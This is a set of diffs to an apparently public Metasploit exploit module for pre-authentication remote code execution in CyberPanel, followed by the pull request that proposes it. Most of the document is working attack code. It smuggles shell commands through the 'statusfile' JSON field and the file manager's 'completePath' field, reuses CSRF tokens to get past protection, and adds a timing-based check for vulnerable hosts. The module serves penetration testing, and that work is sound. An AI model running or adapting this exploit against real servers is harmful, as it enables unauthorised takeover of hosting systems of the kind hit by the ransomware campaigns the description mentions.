-        'Content-Type' => 'application/json',
-        'X-CSRFToken' => get_csrf_token
-      }
-    }, 0)
+    if test_vulnerability(action.name.downcase)
+      CheckCode::Vulnerable('Target is running CyberPanel and is vulnerable.')
+    else
+      CheckCode::Safe('Target is running CyberPanel but does not appear to be vulnerable.')
+    end
   end
 
-  def execute_filemanager_upload
-    csrf_token = get_csrf_token
+  def exploit
+    execute_payload(action.name.downcase, payload.encoded)
+  end
 
-    post_data = Rex::MIME::Message.new
+  def execute_payload(action, injected_payload)
+    endpoint = nil
+    method = nil
+    payload_data = nil
+    headers = {}
+    ctype = nil
 
-    random_domain = Rex::Text.rand_text_alphanumeric(8)
+    case action
+    when 'cve-2024-51567'
+      endpoint = 'dataBases/upgrademysqlstatus'
+      method = 'OPTIONS'
+      payload_data = '{"statusfile": "/dev/null; %s #"}' % injected_payload
 
-    random_complete_path = "/dev/null;#{payload.encoded} #"
+    when 'cve-2024-51568'
+      endpoint = 'filemanager/upload'
+      method = 'POST'
 
-    random_filename = "#{Rex::Text.rand_text_alphanumeric(6)}.txt"
-    random_content = Rex::Text.rand_text_alphanumeric(4)
+      csrf_token = get_csrf_token
 
-    post_data.add_part(random_domain, nil, nil, 'form-data; name="domainName"')
-    post_data.add_part(random_complete_path, nil, nil, 'form-data; name="completePath"')
-    post_data.add_part(random_content, 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{random_filename}\"")
+      post_data = Rex::MIME::Message.new
+      random_domain = Rex::Text.rand_text_alphanumeric(8)
+      random_complete_path = "/dev/null;#{injected_payload} #"
+      random_filename = "#{Rex::Text.rand_text_alphanumeric(6)}.txt"
+      random_content = Rex::Text.rand_text_alphanumeric(4)
+
+      post_data.add_part(random_domain, nil, nil, 'form-data; name="domainName"')
+      post_data.add_part(random_complete_path, nil, nil, 'form-data; name="completePath"')
+      post_data.add_part(random_content, 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{random_filename}\"")
+      payload_data = post_data.to_s
+
+      headers['X-CSRFToken'] = csrf_token
+      headers['Cookie'] = "csrftoken=#{csrf_token}"
+      ctype = "multipart/form-data; boundary=#{post_data.bound}"
+
+    when 'cve-2024-51378'
+      endpoint = "#{['ftp', 'dns'].sample}/getresetstatus"
+      method = 'OPTIONS'
+      payload_data = '{"statusfile": "/dev/null; %s #"}' % injected_payload
+
+    else
+      fail_with(Failure::BadConfig, 'Invalid action selected')
+    end
 
     send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'filemanager', 'upload'),
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-      'headers' => {
-        'X-CSRFToken' => csrf_token,
-        'Cookie' => "csrftoken=#{csrf_token}"
-      },
-      'data' => post_data.to_s
-    }, 0)
+      'method' => method,
+      'uri' => normalize_uri(target_uri.path, endpoint),
+      'data' => payload_data,
+      'ctype' => ctype,
+      'headers' => headers
+    })
+  end
+
+  def test_vulnerability(action)
+    sleep_times = [rand(2..5), rand(2..5)].uniq.sort
+
+    test_payloads = sleep_times.map { |t| "sleep #{t}" }
+    confirmed_payloads = []
+
+    test_payloads.each do |test_payload|
+      start_time = Time.now
+
+      res = execute_payload(action, test_payload)
+
+      next unless res
+
+      elapsed_time = Time.now - start_time
+
+      match = test_payload.match(/sleep (\d+)/)
+      confirmed_payloads << test_payload if match && elapsed_time >= match[1].to_i
+    end
+
+    (confirmed_payloads & test_payloads).size == test_payloads.size
   end
 
   def get_csrf_token
@@ -135,6 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     csrf_token = res.get_cookies.match(/csrftoken=(\w+)/)&.captures&.first
+    vprint_status("CSRF Token retrieved: #{csrf_token}") if csrf_token
     fail_with(Failure::NotFound, 'Unable to retrieve CSRF token.') unless csrf_token
     print_status("CSRF Token retrieved: #{csrf_token}")
     csrf_token

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -32,7 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2024-51567'],
           ['CVE', '2024-51378'],
           ['URL', 'https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce'],
+          ['URL', 'https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/'],
           ['URL', 'https://github.com/DreyAnd/CyberPanel-RCE'],
+          ['URL', 'https://github.com/refr4g/CVE-2024-51378'],
           ['URL', 'https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/'],
           ['URL', 'https://gist.github.com/gboddin/d78823245b518edd54bfc2301c5f8882']
         ],

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Module::HasActions
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CyberPanel Multi CVE Pre-auth RCE',
+        'Description' => %q{
+          This module exploits three separate pre-authenticated Remote Code Execution vulnerabilities in CyberPanel:
+
+          - CVE-2024-51567: Command injection vulnerability in the "upgrademysqlstatus" endpoint.
+          - CVE-2024-51378: Unauthenticated RCE in "/ftp/getresetstatus" and "/dns/getresetstatus".
+
+          These vulnerabilities were exploited in ransomware campaigns affecting over 22,000 CyberPanel instances, with the PSAUX ransomware being the primary actor in these attacks.
+        },
+        'Author' => [
+          'DreyAnd',               # Vulnerability discovery (CVE-2024-51567)
+          'Valentin Lobstein',     # Metasploit Module
+          'Luka Petrovic (refr4g)' # Vulnerability discovery (CVE-2024-51378)
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-51567'],
+          ['CVE', '2024-51378'],
+          ['URL', 'https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce'],
+          ['URL', 'https://github.com/DreyAnd/CyberPanel-RCE'],
+          ['URL', 'https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/'],
+          ['URL', 'https://gist.github.com/gboddin/d78823245b518edd54bfc2301c5f8882']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2024-10-27',
+        'Actions' => [
+          ['CVE-2024-51567', { 'Description' => 'Exploit using CVE-2024-51567' }],
+          ['CVE-2024-51378', { 'Description' => 'Exploit using CVE-2024-51378' }]
+        ],
+        'DefaultAction' => 'CVE-2024-51567',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8090)
+    ])
+  end
+
+  def exploit
+    case action.name.downcase
+    when 'cve-2024-51567'
+      execute_status_update('dataBases/upgrademysqlstatus')
+    when 'cve-2024-51378'
+      execute_status_update("#{['ftp', 'dns'].sample}/getresetstatus")
+    else
+      fail_with(Failure::BadConfig, 'Invalid ACTION selected')
+    end
+  end
+
+  def execute_status_update(endpoint)
+    payload_data = '{"statusfile": "/dev/null; %s #"}' % payload.encoded
+
+    send_request_cgi({
+      'method' => 'OPTIONS',
+      'uri' => normalize_uri(target_uri.path, endpoint),
+      'data' => payload_data,
+      'headers' => {
+        'Content-Type' => 'application/json',
+        'X-CSRFToken' => get_csrf_token
+      }
+    }, 0)
+  end
+
+  def get_csrf_token
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    csrf_token = res.get_cookies.match(/csrftoken=(\w+)/)&.captures&.first
+    print_status("CSRF Token retrieved: #{csrf_token}") if csrf_token
+    fail_with(Failure::NotFound, 'Unable to retrieve CSRF token.') unless csrf_token
+    csrf_token
+  end
+end

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       payload_data = post_data.to_s
 
       headers['X-CSRFToken'] = csrf_token
-      headers['Referer'] = "#{(datastore['SSL'] ? 'https' : 'http')}://#{datastore['RHOST']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, 'filemanager/upload')}"
+      headers['Referer'] = "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, 'filemanager/upload')}"
       headers['Cookie'] = "csrftoken=#{csrf_token}"
       ctype = "multipart/form-data; boundary=#{post_data.bound}"
 


### PR DESCRIPTION
Hello Metasploit Team 🎃,

I am submitting a new module that exploits three pre-authenticated RCE vulnerabilities in CyberPanel: **CVE-2024-51378**, **CVE-2024-51567**, and **CVE-2024-51568**, all of which were actively exploited in October 2024 by PSAUX and other groups. This module leverages security flaws in `/dns/getresetstatus` and `/ftp/getresetstatus` for CVE-2024-51378, `/dataBases/upgrademysqlstatus` for CVE-2024-51567, and `/filemanager/upload` for CVE-2024-51568. Each vulnerability allows attackers to bypass authentication by exploiting `secMiddleware` misconfigurations and executing arbitrary commands via shell metacharacters in key parameters.

### Key Details
- **Affected Versions**: 
  - **CVE-2024-51378** and **CVE-2024-51567**: Affect CyberPanel versions up to 2.3.6 and the unpatched 2.3.7 release.
  - **CVE-2024-51568**: Patched in CyberPanel 2.3.5.
- **Installation & Configuration**: The module has been tested on Ubuntu 18, though it should work on other recent versions as well.

The module includes a detailed documentation file with installation instructions, configuration details, and examples.

CC: @DreyAnd @refr4g